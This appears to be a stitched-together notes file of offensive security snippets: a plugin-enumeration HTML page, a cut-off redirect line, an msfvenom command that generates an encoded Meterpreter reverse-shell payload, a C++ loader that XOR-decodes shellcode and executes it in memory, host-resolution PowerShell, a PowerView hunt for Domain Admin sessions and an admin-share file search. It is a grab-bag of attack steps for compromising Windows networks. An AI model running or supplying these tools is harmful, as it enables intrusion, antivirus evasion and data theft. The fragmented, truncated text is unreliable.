<html>
<head>
    <script type="text/javascript">
    <!--
    function showWindow(){
        var len = navigator.plugins.length;
        newWin = window.open("", "", "height=400,width=500");
        newWin.document.write("<p>Dane wtyczek:</p>");
        for(var i = 0; i < len; i++){
          newWin.document.write("<li>" + navigator.plugins[i].description + "</li>");
        }
        newWin.document.close()
    }
    //-->
    </script>
</head>
<body>
   <form>
       <input type="button" value="Pokaż dane wtyczek" onclick="showWindow()">
    </form>
</body>
</html>
---
window.location.href = "https://www.linkedin.com/error_pages/
---
msfvenom -p windows/meterpreter/reverse_tcp lhost=localhost lport=1234 -e x86/shikata_ga_nai -i 3 -f c
---
#include <windows.h>
#include <iostream>
int main(int argc, char **argv) {
char b[] = {/* your XORd with key of 'xyz' shellcode goes here*/};
char c[sizeof b];
for (int i = 0; i < sizeof b; i++) {c[i] = b[i] ^ 'x';}
void *exec = VirtualAlloc(0, sizeof c, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, c, sizeof c);
((void(*)())exec)();
}
---
foreach ($computer in (get-content C:\hosts.txt)) {
  Try{
    [system.net.Dns]::GetHostAddresses($computer) | Foreach-Object {
     add-content -path C:\hosts-ips.txt -value "$($_.IPAddressToString)"
    }
  } Catch {
  }
}
---
Invoke-StealthUserhunter -GroupName "Domain Admins"
---
dir \\hostname\c$\*.xl* /s/b
---

